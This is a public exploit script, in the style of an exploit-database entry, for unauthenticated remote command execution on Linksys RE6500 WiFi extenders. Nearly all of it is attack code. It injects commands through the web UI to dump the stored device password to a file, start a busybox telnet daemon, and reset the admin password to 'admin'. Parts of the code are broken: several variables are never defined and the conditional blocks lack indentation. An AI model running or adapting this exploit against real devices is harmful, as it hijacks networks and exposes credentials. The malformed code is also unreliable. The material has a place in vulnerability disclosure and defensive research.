# Exploit Title: Linksys RE6500 - Unauthenticated RCE
# Date: 31/07/2020
# Exploit Author: RE-Solver
# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
# Vendor Homepage: www.linksys.com
# Version:FW V1.05 up to FW v1.0.11.001
# Tested on: FW V1.05 up to FW v1.0.11.001
# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution.
# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI.
#!/usr/bin/env python
from requests import Session
import requests
import os
print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
print("Tested on FW V1.05 up to FW v1.0.11.001")
print("RE-Solver @solver_re")
command="nvram_get Password >/tmp/lastpwd"
#save device password;
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r= s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
print("[+] Prev password saved in /tmp/lastpwd")
command="busybox telnetd"
#start telnetd;
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
print("[+] Telnet Enabled")
#set admin password
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
print("[+] Prevent corrupting nvram - set a new password= admin")